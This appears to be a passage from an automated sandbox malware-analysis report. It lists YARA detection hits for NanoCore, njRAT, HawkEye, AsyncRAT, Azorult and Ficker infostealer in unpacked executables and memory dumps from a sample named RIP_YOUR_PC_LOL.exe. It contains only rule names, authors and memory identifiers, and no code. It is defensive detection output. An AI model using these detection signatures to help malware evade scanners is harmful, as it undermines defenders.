                    Source: 0.3.RIP_YOUR_PC_LOL.exe.59c8085.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 7.2.0fd7de5367376231a788872005d7ed4f.exe.24f15a0.1.unpack, type: UNPACKEDPEMatched rule: Detects Ficker infostealer Author: ditekSHen
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.9f22de.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.9f22de.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 17.0.mediaget.exe.ab0000.2.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 17.0.mediaget.exe.ab0000.2.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 8.0.gay.exe.d0000.3.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 8.0.gay.exe.d0000.3.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 4.0.healastounding.exe.902324.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 4.0.healastounding.exe.902324.6.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                    Source: 4.0.healastounding.exe.902324.6.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 9.0.Opus.exe.840000.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 9.0.Opus.exe.840000.2.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                    Source: 9.0.Opus.exe.840000.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 4.2.healastounding.exe.3479694.5.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 5.0.Pluto Panel.exe.f18208.14.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.0.Pluto Panel.exe.f18208.14.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 4.0.healastounding.exe.902324.14.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 4.0.healastounding.exe.902324.14.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                    Source: 4.0.healastounding.exe.902324.14.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 6.0.test.exe.da0000.1.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 4.0.healastounding.exe.95312e.13.raw.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 4.0.healastounding.exe.95312e.13.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.9f86e6.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.9f86e6.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0.3.RIP_YOUR_PC_LOL.exe.5725596.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 0.3.RIP_YOUR_PC_LOL.exe.5725596.2.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 4.0.healastounding.exe.900000.12.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 4.0.healastounding.exe.900000.12.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 4.0.healastounding.exe.900000.12.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                    Source: 4.0.healastounding.exe.900000.12.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 4.0.healastounding.exe.900000.12.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 4.0.healastounding.exe.935129.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 4.0.healastounding.exe.935129.9.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 0.3.RIP_YOUR_PC_LOL.exe.596a627.9.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 0.1.RIP_YOUR_PC_LOL.exe.c8867b.3.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                    Source: 0.1.RIP_YOUR_PC_LOL.exe.9f86e6.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0.1.RIP_YOUR_PC_LOL.exe.9f86e6.0.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 4.0.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 4.0.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 4.0.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                    Source: 4.0.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 4.0.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 11.0.22.exe.530edf.4.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                    Source: 4.0.healastounding.exe.95312e.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 4.0.healastounding.exe.95312e.2.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 4.0.healastounding.exe.900000.8.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 4.0.healastounding.exe.900000.8.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 4.0.healastounding.exe.900000.8.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                    Source: 4.0.healastounding.exe.900000.8.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 4.0.healastounding.exe.900000.8.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 00000009.00000000.414257385.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 00000009.00000000.414257385.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000006.00000000.397644420.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 00000009.00000002.707363158.0000000003ECB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000008.00000000.411478373.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 00000009.00000000.414807841.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 00000009.00000000.414807841.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000009.00000000.416456851.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 00000009.00000000.416456851.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000009.00000002.700831183.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 00000009.00000002.700831183.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000008.00000002.449565052.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 00000000.00000003.388952115.00000000059C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 0000002A.00000000.507357595.0000000000FB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 00000011.00000000.445953483.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 00000011.00000002.701265514.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 0000003B.00000000.627731740.00000000007A2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 00000000.00000000.374606826.0000000001F6B000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
                    Source: 00000000.00000000.374606826.0000000001F6B000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 00000011.00000003.646152049.0000000001338000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 00000024.00000000.475797127.0000000000572000.00000002.00000001.01000000.00000015.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 00000024.00000000.475797127.0000000000572000.00000002.00000001.01000000.00000015.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000006.00000002.701971433.0000000001354000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 0000001C.00000002.567040014.0000000003081000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000019.00000003.459495184.0000000000673000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000002E.00000000.548907669.0000000000722000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 00000011.00000000.445251023.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 00000004.00000000.385235005.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 00000004.00000000.385235005.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000004.00000000.385235005.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 0000002E.00000002.610238464.0000000000722000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000002A.00000002.552899490.0000000000FB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 00000004.00000002.538356356.0000000003471000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 00000004.00000002.538356356.0000000003471000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 00000005.00000002.706080641.00000000036DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000000.00000002.693319449.0000000001F6B000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
                    Source: 00000000.00000002.693319449.0000000001F6B000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 00000006.00000000.405813841.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 00000008.00000000.410285813.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 00000004.00000002.463698979.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 00000004.00000002.463698979.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000004.00000002.463698979.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 00000005.00000000.394040229.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000005.00000000.394040229.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000008.00000000.408615715.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000011.00000000.447375879.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 00000006.00000000.394727625.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 00000005.00000000.394636472.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000005.00000000.394636472.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000026.00000000.491059532.0000000000272000.00000002.00000001.01000000.00000015.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 00000026.00000000.491059532.0000000000272000.00000002.00000001.01000000.00000015.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000006.00000000.399704980.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 00000024.00000002.629223400.0000000000572000.00000002.00000001.01000000.00000015.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 00000024.00000002.629223400.0000000000572000.00000002.00000001.01000000.00000015.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000006.00000002.703770994.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 00000009.00000000.415266906.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 00000009.00000000.415266906.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000019.00000003.459275166.0000000000698000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000005.00000002.701277187.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000005.00000002.701277187.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000019.00000003.458681148.000000000067C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000000.00000002.502131214.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000000.00000002.502131214.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000001C.00000002.579383399.0000000004081000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000000.00000003.386628983.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 00000000.00000000.371829021.0000000001893000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 00000000.00000000.371829021.0000000001893000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000000.00000000.371829021.0000000001893000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 0000001C.00000002.514866763.0000000000922000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 0000001C.00000002.514866763.0000000000922000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000000.00000001.375725825.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000000.00000001.375725825.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000004.00000002.546334194.0000000004474000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 00000004.00000002.546334194.0000000004474000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
                    Source: 00000004.00000002.546334194.0000000004474000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000011.00000000.446671445.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 00000009.00000002.708577022.0000000005870000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 00000009.00000002.708577022.0000000005870000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
                    Source: 00000008.00000000.409570794.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 00000019.00000003.458183685.0000000000660000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000004.00000000.381351381.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 00000004.00000000.381351381.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000004.00000000.381351381.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 00000006.00000002.701012196.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 00000025.00000000.491609227.00000000002A2000.00000002.00000001.01000000.00000016.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 0000001C.00000000.461250332.0000000000922000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 0000001C.00000000.461250332.0000000000922000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000000.00000002.679442760.0000000001893000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 00000000.00000002.679442760.0000000001893000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000000.00000002.679442760.0000000001893000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                    Source: 00000009.00000002.708751563.0000000005B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 00000009.00000002.708751563.0000000005B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
                    Source: 00000024.00000002.674377761.0000000003CF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000024.00000002.673042782.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000005.00000000.397247474.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000005.00000000.397247474.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000004.00000000.382829254.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
                    Source: 00000004.00000000.382829254.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
